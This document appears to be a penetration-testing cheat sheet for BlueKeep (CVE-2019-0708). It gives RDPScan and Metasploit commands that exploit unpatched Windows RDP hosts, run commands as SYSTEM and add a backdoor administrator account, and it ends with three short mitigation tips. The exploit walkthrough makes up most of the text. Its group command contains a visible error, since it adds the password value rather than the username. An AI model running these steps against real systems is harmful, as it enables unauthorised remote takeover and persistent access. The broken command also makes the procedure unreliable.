BlueKeep [CVE-2019-0708]

Table of contents

1. Prerequisites
2. Exploit
3. Recommendations

---

BlueKeep exploit is not stable and might cause a crash of the target.

Prerequisites

• Target is a Windows host with RDP port opened (3389 by default).

Exploit

First of all, you can check if target is vulnerable using RDPScan.

rdpscan $target

To exploit vulnerable targets, run following commands using Metasploit.

# Start metasploit.
msfconsole

# Look for bluekeep exploit.
search bluekeep

# Take (exploit/windows/rdp/cve_2019_0708_bluekeep_rce).
use 1

# Take payload (windows/x64/exec).
show payloads
set payload 19

# Setup the exploit to check exploitability (should return local\SYSTEM).
set CMD whoami
set RHOSTS $target
run

# To gain administrative access.
set CMD net user $username $password /add; net localgroup Administrators $password /add
run

Recommendations

• Update Windows computers to a supported version by Microsoft.
• Remove vulnerable Windows computers from the domain to put them in WORKGROUP.
• Isolate vulnerable Windows computers in a dedicated sub-network and restrict its access.